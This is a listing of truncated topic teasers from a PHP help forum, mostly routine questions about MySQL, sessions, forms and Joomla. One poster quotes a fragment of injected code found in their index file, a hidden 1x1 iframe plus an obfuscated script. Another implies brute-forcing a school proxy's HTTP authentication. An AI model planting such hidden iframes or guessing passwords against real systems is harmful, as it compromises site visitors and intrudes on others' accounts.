39,393 Topics
![]() | |
Hi all, Any body knows what is meant by the following regular expression '/\&acct=([^"]*)/' using with 'preg_match_all'. If knows please do reply me... Thanx a lot in advance... | |
Hi, I am developing a piece of software which is not in any way being designed to hack into my schools proxy server using HTTP auth :P At the moment I have got it to generate random passwords of a random length, however using this method it is sometimes repeating … | |
Hello, can anyone help me. im working on a project using joomla cms and within a certain component, all of a sudden the save, edit and cancel buttons dont work. all the buttons that have javascript code behind dont work in the joomla back end. plus, the buttons work perfect … | |
good day.! I want this date format to be echo. 2009-2010. My code gots error when i try to show this format. Here is my code: [code=php] $nowdate = date('Y') "-" date('Y') + 1; echo $nowdate; [/code] Thank you for giving time this simple problem. God bless on this mother … | |
Hello Fellow members, Need assistance in my PHP/SQL statement please. [code=php] $sql1 = "SELECT * FROM `forum_cats` WHERE `admin` < ".$row['admin']."+1"; [/code] I would like the above code in Ascending order i.e ORDER BY ASC. Thanks | |
Hi Ive just came across this syntax error and have no idea on how to go about fixing it hope someone can help? Im using Php myadmin # Server version: 5.0.45 # Protocol version: 10 Here is the error: "You have an error in your SQL syntax; check the manual … | |
Good day.! How to clear all session variable when they click back on the internet explorer.?Assuming that i am on info.php page, when i click back on that page, all session on the whole site will be set to null. Pls help if this is possible. Thank you.God bless on … | |
Good day.! I have a page called loginforgot.php. There are two txtfield on this form(txtuserid) and (txtanswer) and 2 command button(retrieve) and (cancel). When the user click on retrived, the page will automatically send email which contains the password to the email address of the user base on the txtuserid … | |
I created my web page in dreamweaver,suprising thing is that everything i write appears bolded. i checked well and discovered this code at the top of my page is causing the problem,which is been inserted by Dreamweaver its self when i started my page. So i dont know what is … | |
hey guys, I am going to complete my 3rd year this month and i am not able to think of any ideas for the fianl year project. I have workeed on php,mySQL,javascript,html,css. Please suggest some ideas. | |
I was amazed when see a web site loading. Visit [url]www.m4marry.com[/url] This site will load in amazing speed even if it had big size. How we can do that... Anyone had any idea ? Please reply... I am sorry if the post is in the wrong place thanks Rajeesh | |
Good day! I have a link named(validate) on validateage.php. When the user click on the (validate) link, the field(infoclick) on the mysql table (information) will be change to "validated" because it is "unvalidated" by default, and then the link will re display the page validateage.php. I just need someone to … | |
I dont understand wat has happened... the code was working fine yesterday when testing, and now i try to use it today, and it doesnt work. setcookie() isnt setting the cookie... Maybe i have missed something, so hopefully someone here can see where ive gone wrong. Just to confirm though, … | |
I just need a basic php code so that I can edit it. Thanks. | |
hi i have this page for loading the projects for a current user if that user is admin it displays all the projects in a table thats fine i aslso wanted a button to show up for admin to upload a new file but i get "Parse error: syntax error, … | |
I am trying to make a proxy server for my house to connect to the internet through. I am trying to use phpproxy, but I have no background in php or anything like this other than a little html. Can anyone show me how to do this please? | |
Hi everyone, Can I please get somehelp, I have locked myself out, I know the user/password but can not sure which ini file to edit to input the pass? I am new to this, please help thanks [QUOTE] Welcome to phpMyAdmin Error MySQL said: Documentation #1130 - Host 'localhost' is … | |
Hi, I want to add cricket game in my site... when user finish the game..he submit the score result.. i want to save that result in database... And display top scorer.... How to do this?? any link or sample example plz... | |
please can anyone give me more information on how to solve this problem i have. im writing a php code to create a form for a ms access database, i want customers to be able to select or tick various things they want in our services either from a dropdown … | |
Hi all, I just learn PHP couple days ago, due to some 'trouble' in the company and my boss asking me to create an employee database Help on PHP MYSQL Forms Input With some help of dreamweaver, i finally manage to create a form for employee database but..... Sadly....some of … | |
Here is the HTML [code] <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Food Order Form</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> </head> <body> <h1>A Chinese Dinner!</h1> <form name="dinner" action="wolfram0302.php" method="get"> <table border="6" cellspacing="1" width="600"> <tr> <td>First Name:<input name="first" /> Last Name: <input name="last" /> </td><br /> </tr> <tr> … | |
im trying to create a feedback form that allows the user to select a recipent from a drop down menu so that once the send button is hit, the email is sent to the persons email address in the list. i have thelist created and have attempted the php handler … | |
Hello, I believe I am asking the correct thing in the right forum. How can I set up a system on my website that has some sort of login page were you have a username and password and then it takes to the pages of the website that you can … | |
I have this foreach loop that loops through the title and link of an xml file. I want to be able to sperate the title and put it into an array or assign each title to a variable. I also want to do the same thing with the link. Could … | |
Hi a new bee to php, Can any one help me, i AM creating a login form which consists of name address and email id , what is the problem i have here is when entering datas into address field , it throws error as [ICODE]errorYou have an error in … | |
Hi there, I am new to Php and MySql. However, i have been learning for some time now. I get the above error and my line 77 has the following statement: $result=mysql_query($query,$conn); Any ideas? If you need more of the code please let me know. Thanks a lot, Sofia | |
hi I am not sure if this is the right section, but the files I am using in my website are written in php language. Yesterday, I try to edit my files and found at the end of the index file this code: [CODE]<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4963660743084(l4963660743855){ … | |
can someone tell me what is the best php software to install on IIS with php5 and mysql to make blogs and classifieds? Thanks | |
Ok so I have this xml file [code] <?xml version="1.0" encoding="utf-8"?> <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"> <channel> <atom:link rel="self" href="http://www.ubcmiami.org/podcasts/podcast.xml" type="application/rss+xml" /> <lastBuildDate>Mon, 09 Mar 2009 17:17:39 -0400</lastBuildDate> <title>UBC Miami - Messages</title> <itunes:author>UBC Miami</itunes:author> <link>http://www.ubcmiami.org</link> <generator>Podcast Maker v1.3.8b - http://www.lemonzdream.com/podcastmaker</generator> <description><![CDATA[Weekend Messages from UBC in Miami, FL. We are transformational community … | |
hi I have designed a php script an was wondering about a way that I do not allow the customer who buys to install it on more than one domain. I am concerned about the logic of it more than the scripting, but if there is a script available to … |
The End.